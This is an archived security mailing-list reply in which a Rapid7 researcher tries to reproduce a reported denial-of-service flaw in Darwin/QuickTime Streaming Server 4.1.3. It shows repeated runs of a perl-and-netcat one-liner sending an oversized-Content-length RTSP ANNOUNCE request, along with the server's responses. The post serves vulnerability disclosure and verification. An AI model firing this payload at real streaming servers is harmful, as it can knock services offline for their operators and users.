[<prev] [next>] [day] [month] [year] [list]
Message-ID: <OF9B18B174.B4693100-ON85256D2F.0050407C@hq.rapid7.com>
From: Joe_Testa at rapid7.com (Joe Testa)
Subject: Re: QuickTime/Darwin Streaming Server security issues
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Greetings.
I'm having trouble reproducing this vulnerability as well. See below:
[jdog@...derland jdog]$ cat /etc/redhat-release
jdog's Super Tricked-out Red Hat Linux release 8.0 (Psyche)
[jdog@...derland jdog]$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc
localhost 554
RTSP/1.0 200 OK
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq: 1
Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE, SET_PARAMETER, RECORD
It takes a few tries against *localhost* to notice the adverse effects:
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) : Connection refused
However, the port always remains open when I use the external IP address,
no matter how many times I run the example exploit:
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 554 (rtsp) open
RTSP/1.0 401 Unauthorized
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
WWW-Authenticate: Digest realm="Streaming Server", nonce="a4a1975c2b5c8e3fa
557e1f3d486e5a1"
RTSP/1.0 400 Bad Request
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
Connection: Close
punt!
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 554 (rtsp) open
RTSP/1.0 401 Unauthorized
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
WWW-Authenticate: Digest realm="Streaming Server", nonce="eb9cc1d1fb4674ad
f37cef319d38fc4d"
RTSP/1.0 400 Bad Request
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
Connection: Close
punt!
[jdog@...derland jdog]$
So, given the exploit code given in the original advisory for this issue,
it appears as though Quicktime Streaming Server is only vulnerable from
localhost.
Perhaps this was the trouble Apple was having? Or am I missing something
also?
- Joe
P.S. Read my blog!: http://curseddestiny.blogspot.com/
- Joe Testa, Rapid 7, Inc.
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xC6E50EDC
3691 6B1D 4813 DEA2 D18C 202D 0563 DB41 C6E5 0EDC
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (OpenVMS)
iD8DBQE+ziz1BWPbQcblDtwRAoDPAKDJ/Mmwi1QOJvaGgcVN0h1XeywkQQCglgs2
MzpK6ok04PtnuRscEXlVe3M=
=H0M8
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists